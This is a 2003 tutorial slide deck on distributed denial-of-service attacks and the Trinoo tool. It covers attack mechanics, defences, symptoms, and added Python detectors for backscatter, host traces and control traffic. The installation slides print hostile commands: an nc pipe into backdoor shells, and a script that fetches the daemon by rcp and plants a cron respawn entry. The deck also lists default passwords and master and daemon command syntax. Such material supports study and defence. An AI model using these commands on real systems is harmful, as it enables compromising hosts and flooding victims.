An Introduction to DDoS
And the “Trinoo” Attack Tool
Prepared by Ray Lam, Ivan Wong
July 10, 2003
Outline
- Background on DDoS
  - Attack mechanism
  - Ways to defend
- The attack tool – Trinoo
  - Introduction
  - Attack scenario
  - Symptoms and defense
  - Weaknesses and next evolution
Background on DDoS
Attack mechanism
Denial-of-Service
- Flooding-based: send packets to the victim to consume its network resources and system resources
- Traditional DoS: one attacker
- Distributed DoS: countless attackers
Attack Mechanism
- Direct attack: attacker A sends TCP SYN, ICMP, UDP… packets straight to victim V; the source IP addresses are usually spoofed.
- Reflector attack: A sends TCP SYN, ICMP, UDP… packets to reflector R with V’s address as the source IP address; R’s replies (TCP SYN-ACK, TCP RST, ICMP, UDP…) are delivered to V.

Attack Architecture
- Direct attack: Attacker → Masters (handlers) → Agents (daemons or zombies) → Victim. The agents send TCP SYN, ICMP, UDP… packets to V (the source IP addresses are usually spoofed).
- Reflector attack: Attacker → Masters (handlers) → Agents (daemons or zombies) → Reflectors → Victim. The agents send TCP SYN, ICMP, UDP… packets to the reflectors with V’s address as the source IP address; the reflectors answer V with TCP SYN-ACK, TCP RST, ICMP, UDP…
Attack Methods
Attack type          Attack packets                              Reply packets
Smurf                ICMP echo queries to broadcast address      ICMP echo replies
SYN flooding         TCP SYN packets                             TCP SYN-ACK packets
RST flooding         TCP packets to closed ports                 TCP RST packets
ICMP flooding        ICMP queries                                ICMP replies
                     UDP packets to closed ports                 Port unreachable
                     IP packets with low TTL                     Time exceeded
DNS reply flooding   DNS queries (recursive) to DNS servers      DNS replies

Backscatter Analysis (Moore et al.)
- Measured DoS activity on the Internet: TCP (94+ %), UDP (2 %), ICMP (2 %)
- TCP attacks based mainly on SYN flooding
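Backscatter analysis reads the table above from right to left: a monitor on an address block that never sends traffic still receives reply packets whenever an attacker spoofs one of its addresses, and the reply type reveals the attack method while the reply’s source address is the victim. The following is an added example written for this page (not code from the slides or from Moore et al.) that applies that inference to a constructed batch of packet records; the record format, the address values and the `min_packets` threshold are assumptions of the example.

```python
from collections import Counter, defaultdict

# Reply packet type -> attack method that provokes it, after the
# "Attack Methods" table. A packet arriving unsolicited at an address block
# that never sends traffic can only be a reply to a packet that carried one
# of our addresses as a spoofed source, so its source address is the victim.
REPLY_TO_ATTACK = {
    ("tcp", "syn-ack"): "SYN flooding",
    ("tcp", "rst"): "RST flooding",
    ("icmp", "echo-reply"): "Smurf (ICMP echo to broadcast) / ICMP flooding",
    ("icmp", "port-unreachable"): "UDP flooding of closed ports",
    ("icmp", "time-exceeded"): "IP packets with low TTL",
    ("udp", "dns-reply"): "DNS reply flooding",
}


def classify_backscatter(packets, min_packets=3):
    """Group unsolicited packets by source (the victim), infer the attack
    method from the dominant reply type, and report protocol shares.

    packets: iterable of dicts with keys src, proto, kind (constructed records
    here; a real monitor would decode them from captured traffic).
    Returns (victims, shares): per-victim summary and protocol share in %.
    """
    by_victim = defaultdict(Counter)
    proto_count = Counter()
    for p in packets:
        proto_count[p["proto"]] += 1
        by_victim[p["src"]][(p["proto"], p["kind"])] += 1

    victims = {}
    for victim, kinds in by_victim.items():
        total = sum(kinds.values())
        if total < min_packets:
            continue  # too few packets to call it an attack (assumed threshold)
        (proto, kind), _ = kinds.most_common(1)[0]
        victims[victim] = {
            "packets": total,
            "attack": REPLY_TO_ATTACK.get((proto, kind), "unknown"),
            "reply_kind": f"{proto}/{kind}",
        }

    total = sum(proto_count.values())
    shares = {}
    if total:
        shares = {proto: round(100.0 * n / total, 1) for proto, n in proto_count.items()}
    return victims, shares


# Constructed sample: what a monitor on an unused address block might record.
# Sources are documentation addresses, not real hosts.
SAMPLE_BACKSCATTER = (
    [{"src": "203.0.113.10", "proto": "tcp", "kind": "syn-ack"}] * 6
    + [{"src": "203.0.113.10", "proto": "tcp", "kind": "rst"}]
    + [{"src": "198.51.100.7", "proto": "icmp", "kind": "port-unreachable"}] * 4
    + [{"src": "192.0.2.1", "proto": "icmp", "kind": "echo-reply"}]  # below threshold
)

if __name__ == "__main__":
    victims, shares = classify_backscatter(SAMPLE_BACKSCATTER)
    for v, info in victims.items():
        print(f"{v}: {info['packets']} packets, {info['reply_kind']} -> {info['attack']}")
    print("protocol share (%):", shares)
```

The per-victim majority vote matters because one flood usually produces mixed replies (a SYN flood against a host with some closed ports yields both SYN-ACKs and RSTs); the dominant reply type, not every reply, names the attack.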
Background on DDoS
Ways to defend
Strategy
Three lines of defense:
- Attack prevention – before the attack
- Attack detection and filtering – during the attack
- Attack source traceback – during and after the attack
Attack prevention
- Protect hosts from installation of masters and agents by attackers
- Scan hosts for symptoms of agents being installed
- Monitor network traffic for known message exchanges among attackers, masters and agents

Attack prevention (cont.)
- Inadequate and hard to deploy
- Don’t-care users leave security holes
- ISP and enterprise networks have no incentive
Attack source traceback
- Identify the actual origin of a packet without relying on its source IP
- Two approaches:
  - Routers record information about packets
  - Routers send additional information about packets to the destination

Attack source traceback (cont.)
- Source traceback cannot stop an ongoing DDoS attack
- Cannot trace origins behind firewalls and NAT (network address translators)
- More to do for reflector attacks (attack packets come from legitimate sources)
- Useful in post-attack law enforcement
Attack detection and filtering
- Detection: identify the DDoS attack and the attack packets
- Filtering: classify normal and attack packets; drop the attack packets

Attack detection and filtering (cont.)
- Can be done in 4 places: the victim’s network, the victim’s ISP network, further upstream ISP networks, the attack source networks
- Dispersed agents send packets to a single victim – like pouring packets in from the top of a funnel
Attack detection and filtering (cont.)
Funnel view, from top to bottom: attack source networks → further upstream ISP networks → victim’s ISP network → victim’s network → victim.
- Effectiveness of filtering increases towards the top (the attack source networks)
- Effectiveness of detection increases towards the bottom (the victim)
Attack detection and filtering (cont.)
- Detection
  - Easy at the victim’s network – large amount of attack packets
  - Difficult at an individual agent’s network – small amount of attack packets
- Filtering
  - Effective at the agents’ networks – less likely to drop normal packets
  - Ineffective at the victim’s network – more normal packets are dropped
D&F at agent’s network
- Usually cannot detect a DDoS attack
- Can filter attack packets with spoofed addresses:
  - attack packets in direct attacks
  - attack packets from agents to reflectors in reflector attacks
- Ensuring that all ISPs install ingress packet filtering is impossible
D&F at victim’s network
- Detect the DDoS attack: unusually high volume of incoming traffic of certain packet types; degraded server and network performance
- Filtering is ineffective:
  - attack and normal packets have the same destination – the victim’s IP and port
  - attack packets have spoofed source IPs or come from many different IPs
  - attack and normal packets are indistinguishable
D&F at victim’s upstream ISP
- Often requested by the victim to filter attack packets
- Alert protocol: the victim cannot receive an ACK from the ISP; requires strong authentication and encryption
- Filtering ineffective: the ISP network may also be jammed

D&F at further upstream ISP
- Backpressure approach: the victim detects the DDoS attack, and upstream ISPs filter the attack packets
The attack tool – Trinoo
Introduction
- Discovered in August 1999
- Daemons found on Solaris 2.x systems
- Attacked a system in the University of Minnesota; the victim was unusable for 2 days

Attack type
- UDP flooding
- Default size of UDP packet: 1000 bytes – malloc() a buffer of this size and send its uninitialized content
- Default period of attack: 120 seconds
- Destination port: randomly chosen from 0 – 65534
The attack tool – Trinoo
Attack scenario

Installation
1. Hack an account – acts as a repository for scanning tools, attack tools, Trinoo daemons, Trinoo masters, etc.
   Requirements: high bandwidth connection, large number of users, little administrative oversight

Installation (cont.)
2. Compromise systems – look for vulnerable systems
   - Unpatched Sun Solaris and Linux; remote buffer overflow exploitation
   - Set up a root account, open TCP ports
   - Keep a `friend list`

Installation (cont.)
3. Install daemons – use “netcat” (“nc”) and “trin.sh”
   - netcat: network version of “cat”
   - trin.sh: shell script to set up daemons
   ./trin.sh | nc 128.aaa.167.217 1524 &
   ./trin.sh | nc 128.aaa.167.218 1524 &
Installation (cont.)
trin.sh – echoes the commands that the remote shell reached through nc executes:
echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
echo "echo rcp is done moving binary"
echo "chmod +x /usr/sbin/rpc.listen"
echo "echo launching trinoo"
echo "/usr/sbin/rpc.listen"
echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
echo "crontab cron"
echo "echo launched"
echo "exit"
Architecture
- Direct attack: Attacker → Masters (handlers) → Agents (daemons or zombies) → Victim

Communication ports
- Monitor these ports to detect the presence of a master or an agent:
  - Attacker → Master: TCP port 27665
  - Master → Daemon: UDP port 27444
  - Daemon → Master: UDP port 31335
Password protection
- Password used to prevent administrators or other hackers from taking control
- Encrypted password compiled into master and daemon using crypt()
- Clear-text password is sent over the network – the session is not encrypted
- The received password is encrypted and compared

Password protection (cont.)
Default passwords:
- “l44adsl” – trinoo daemon password
- “gOrave” – trinoo master server startup
- “betaalmostdone” – trinoo master remote interface password
- “killme” – trinoo master password to control the “mdie” command
Login to master
- Telnet to port 27665 of the host with the master
- Enter password “betaalmostdone”
- Warns if others try to connect to the master

[root@r2 root]# telnet r1 27665
Trying 192.168.249.201...
Connected to r1.router (192.168.249.201).
Escape character is '^]'.
betaalmostdone
trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]

trinoo>
Master and daemon
- Communicate by UDP packets
- Command line format: arg1 password arg2
- Default password is “l44adsl”
- When a daemon starts, it sends “HELLO” to the master
- The master maintains a list of daemons

Master commands
- dos IP – DoS the IP address specified; “aaa l44adsl IP” is sent to each daemon
- mdos <ip1:ip2:ip3> – DoS the IPs simultaneously
- mtimer N – set attack period to N seconds

Master commands (cont.)
- bcast – list all daemons’ IPs
- mdie password – shut down all daemons
- killdead – invite all daemons to send “HELLO” to the master; delete all dead daemons from the list

Daemon commands
- Not used directly; only used by the master to send commands to daemons
- Consist of 3 letters, to avoid exposing the commands to the Unix command “strings” run on the binary

Daemon commands (cont.)
- aaa password IP – DoS the specified IP
- bbb password N – set attack period to N seconds
- rsz password N – set attack packet size to N bytes
The attack tool – Trinoo
Symptoms and defense

Symptoms
Masters – crontab and friend list
- Crontab entry:
* * * * * /usr/sbin/rpc.listen
- Friend list kept in the files “...” and “...-b”:
# ls -l ... ...-b
-rw-------   1 root     root           25 Sep 26 14:46 ...
-rw-------   1 root     root           50 Sep 26 14:30 ...-b

Symptoms
Masters (cont.) – socket status
# netstat -a --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 *:27665                 *:*                     LISTEN
. . .
udp        0      0 *:31335                 *:*
. . .

Symptoms
Masters (cont.) – file status
# lsof | egrep ":31335|:27665"
master    1292 root    3u  inet   2460       UDP *:31335
master    1292 root    4u  inet   2461       TCP *:27665 (LISTEN)

# lsof -p 1292
COMMAND PID  USER FD  TYPE DEVICE SIZE    NODE  NAME
master  1292 root cwd DIR  3,1    1024    14356 /tmp/...
master  1292 root rtd DIR  3,1    1024    2     /
master  1292 root txt REG  3,1    30492   14357 /tmp/.../master
master  1292 root mem REG  3,1    342206  28976 /lib/ld-2.1.1.so
master  1292 root mem REG  3,1    63878   29116 /lib/libcrypt-2.1.1.so

Symptoms
Daemons – socket status
# netstat -a --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
. . .
udp        0      0 *:1024                  *:*
udp        0      0 *:27444                 *:*
. . .

Symptoms
Daemons (cont.) – file status
# lsof | egrep ":27444"
ns        1316 root    3u  inet   2502       UDP *:27444

# lsof -p 1316
COMMAND PID  USER FD  TYPE DEVICE SIZE    NODE   NAME
ns      1316 root cwd DIR  3,1    1024    153694 /tmp/...
ns      1316 root rtd DIR  3,1    1024    2      /
ns      1316 root txt REG  3,1    6156    153711 /tmp/.../ns
ns      1316 root mem REG  3,1    342206  28976  /lib/ld-2.1.1.so
ns      1316 root mem REG  3,1    63878   29116  /lib/libcrypt-2.1.1.so
ns      1316 root mem REG  3,1    4016683 29115  /lib/libc-2.1.1.so
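The symptoms above (sockets bound to 27665/tcp, 31335/udp or 27444/udp, an every-minute crontab entry for /usr/sbin/rpc.listen, and binaries running out of /tmp/...) can be turned into a host audit. The following is an added example written for this page, not code from the slides or from Dittrich’s analysis; it parses the Linux `netstat -a --inet` and `lsof -p` formats exactly as they appear on the slides, the sample netstat and lsof text is taken from the master-host slides, and the crontab sample (with one benign entry) is constructed.

```python
import re

# Trinoo control ports, as listed on the "Communication ports" slide.
TRINOO_PORTS = {
    ("tcp", 27665): "master: attacker login port",
    ("udp", 31335): "master: receives daemon HELLO and replies",
    ("udp", 27444): "daemon: receives master commands",
}
# Paths named on the symptoms slides: the daemon binary and the "/tmp/..." working dir.
SUSPICIOUS_PATHS = ("/usr/sbin/rpc.listen", "/tmp/...")

# Matches data lines of `netstat -a --inet` (Linux layout shown on the slides):
# proto, recv-q, send-q, local address ending in ":port", foreign address.
NETSTAT_RE = re.compile(r"^(tcp|udp)\s+\d+\s+\d+\s+\S+:(\d+)\s+\S+")


def check_netstat(output):
    """Return (proto, port, description) for each socket bound to a Trinoo port."""
    hits = []
    for line in output.splitlines():
        m = NETSTAT_RE.match(line.strip())
        if not m:
            continue
        key = (m.group(1), int(m.group(2)))
        if key in TRINOO_PORTS:
            hits.append(key + (TRINOO_PORTS[key],))
    return hits


def check_crontab(crontab):
    """Flag cron entries that run a known Trinoo path, or that run every minute
    (the slides show the daemon being respawned by a '* * * * *' entry)."""
    findings = []
    for line in crontab.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue  # not a five-field schedule plus command
        schedule, command = fields[:5], fields[5]
        if any(p in command for p in SUSPICIOUS_PATHS):
            findings.append(("high", "known Trinoo path", line))
        elif schedule == ["*"] * 5:
            findings.append(("review", "job runs every minute", line))
    return findings


def check_lsof(output):
    """From `lsof -p PID` output, return (command, pid, fd, path) for files
    under a suspicious path (e.g. a binary running out of /tmp/...)."""
    findings = []
    for line in output.splitlines():
        parts = line.split()
        if len(parts) < 9 or parts[0] == "COMMAND":
            continue  # header line or truncated row
        path = parts[-1]
        if any(path.startswith(p) for p in SUSPICIOUS_PATHS):
            findings.append((parts[0], int(parts[1]), parts[3], path))
    return findings


def audit_host(netstat, crontab, lsof):
    """Combine the three checks into one report keyed by evidence type."""
    return {
        "sockets": check_netstat(netstat),
        "cron": check_crontab(crontab),
        "files": check_lsof(lsof),
    }


# Sample inputs: netstat and lsof text as shown on the master-host slides;
# the crontab is constructed and includes one benign nightly job.
MASTER_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 *:27665                 *:*                     LISTEN
udp        0      0 *:31335                 *:*
"""
MASTER_CRONTAB = """\
0 3 * * * /usr/bin/updatedb
* * * * * /usr/sbin/rpc.listen
"""
MASTER_LSOF = """\
COMMAND PID  USER FD  TYPE DEVICE SIZE   NODE  NAME
master  1292 root cwd DIR  3,1    1024   14356 /tmp/...
master  1292 root rtd DIR  3,1    1024   2     /
master  1292 root txt REG  3,1    30492  14357 /tmp/.../master
master  1292 root mem REG  3,1    342206 28976 /lib/ld-2.1.1.so
"""

if __name__ == "__main__":
    report = audit_host(MASTER_NETSTAT, MASTER_CRONTAB, MASTER_LSOF)
    for section, items in report.items():
        for item in items:
            print(f"[{section}] {item}")
```

The port check alone is weak evidence, since any program may bind a high port; the three checks together (control port, respawn cron entry, binary under /tmp/...) are what the slides present as the signature, which is why the audit reports them side by side rather than scoring any one of them.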
Defenses
- Prevent root-level compromise: patch systems, set up firewalls, monitor traffic
- Block abused ports (high-numbered UDP ports)
  - Trade-off: also blocks normal programs using the same ports
The attack tool – Trinoo
Weaknesses and next evolution

Weaknesses
- Single kind of attack (UDP flooding) – easily defended by a single defense tool
- Uses an IP as the destination address – “moving target defense”: the victim changes IP to avoid the attack

Weaknesses (cont.)
- Password, encrypted password and commands are visible in the binary images; use the Unix command “strings” to obtain them:
  - strings master
  - strings -n3 ns
- Check whether Trinoo is found; crack the encrypted passwords

Weaknesses (cont.)
- Password travels in plain text on the network
- Daemon password is frequently sent in master-to-daemon commands
- Get the password with “ngrep” or “tcpdump”, which show the UDP payload
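The same property that exposes the password to ngrep (clear-text, fixed-grammar commands on fixed UDP ports) is what lets a network sensor recognise master-to-daemon traffic. The following is an added example written for this page, not code from the slides or from Dittrich’s analysis; it implements a signature for the daemon command format and the daemon “HELLO” given on the “Master and daemon” and “Daemon commands” slides. The datagram tuple format, the private addresses and the `scan_datagrams` helper are assumptions of the example; the command uses the default daemon password named on the slides.

```python
import re

DAEMON_PORT = 27444   # daemon listens here for master -> daemon commands
MASTER_PORT = 31335   # master listens here for daemon -> master traffic

# Master -> daemon command format from the slides: three-letter command,
# daemon password, one argument (target IP or a number).
DAEMON_CMD_RE = re.compile(r"^(aaa|bbb|rsz)\s+(\S+)\s+(\S+)$")
CMD_MEANING = {
    "aaa": "DoS the specified IP",
    "bbb": "set attack period (seconds)",
    "rsz": "set attack packet size (bytes)",
}


def inspect_udp_datagram(src, dst, dport, payload):
    """Return an alert dict if the datagram looks like Trinoo control traffic, else None.

    The clear-text password is deliberately not copied into the alert (only
    its length is), so the sensor's logs do not become a second place where
    the secret is stored.
    """
    text = payload.decode("ascii", errors="replace").strip()
    if dport == DAEMON_PORT:
        m = DAEMON_CMD_RE.match(text)
        if m:
            cmd, password, arg = m.groups()
            return {
                "rule": "trinoo master->daemon command",
                "master": src,
                "daemon": dst,
                "command": cmd,
                "meaning": CMD_MEANING[cmd],
                "argument": arg,
                "password_len": len(password),
            }
    elif dport == MASTER_PORT and "HELLO" in text:
        # The slides say a starting daemon announces itself to the master with "HELLO".
        return {
            "rule": "trinoo daemon->master HELLO",
            "daemon": src,
            "master": dst,
        }
    return None


def scan_datagrams(datagrams):
    """Run the inspector over (src, dst, dport, payload) tuples; keep only matches."""
    alerts = []
    for src, dst, dport, payload in datagrams:
        alert = inspect_udp_datagram(src, dst, dport, payload)
        if alert is not None:
            alerts.append(alert)
    return alerts


# Constructed UDP datagrams (private addresses, documentation-range target).
SAMPLE_DATAGRAMS = [
    ("10.0.0.5", "10.0.0.9", 27444, b"aaa l44adsl 203.0.113.10"),  # command to a daemon
    ("10.0.0.9", "10.0.0.5", 31335, b"*HELLO*"),                   # daemon announcing itself
    ("10.0.0.9", "10.0.0.1", 53, b"\x12\x34\x01\x00"),              # ordinary DNS query
    ("10.0.0.5", "10.0.0.9", 27444, b"hello world"),                # right port, wrong grammar
]

if __name__ == "__main__":
    for alert in scan_datagrams(SAMPLE_DATAGRAMS):
        print(alert)
```

Matching on port plus grammar, rather than port alone, keeps the rule from firing on unrelated programs that happen to use these high UDP ports (the same trade-off the “Defenses” slide notes for port blocking). The target address in an “aaa” alert is the victim, which is what a responder needs to notify the site being flooded.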
Uproot a Trinoo network
- Locate a daemon; use “strings” to obtain the IPs of the masters
- Contact the sites with a master installed; those sites check their list of daemons by inspecting the file “...” or by getting the master login password and using the “bcast” command
- Get the “mdie” password and use “mdie” to shut down all daemons; repeat “mdie” periodically, as the daemons are restarted by crontab

Next evolution
- Combination of several attack types (SYN flood, UDP flood, ICMP flood…) – higher chance of a successful attack
- Stronger encryption of embedded strings and passwords
- Use of an encrypted communication channel; communicate by a protocol that is difficult to detect or block, e.g. ICMP
References
R. Chang, “Defending against Flooding-Based Distributed Denial-of-Service Attacks: A Tutorial,” Oct. 2002
D. Dittrich, “The DoS Project’s ‘Trinoo’ Distributed Denial of Service Attack Tool,” http://staff.washington.edu/dittrich/misc/trinoo.analysis.txt, Oct. 1999
Open Discussion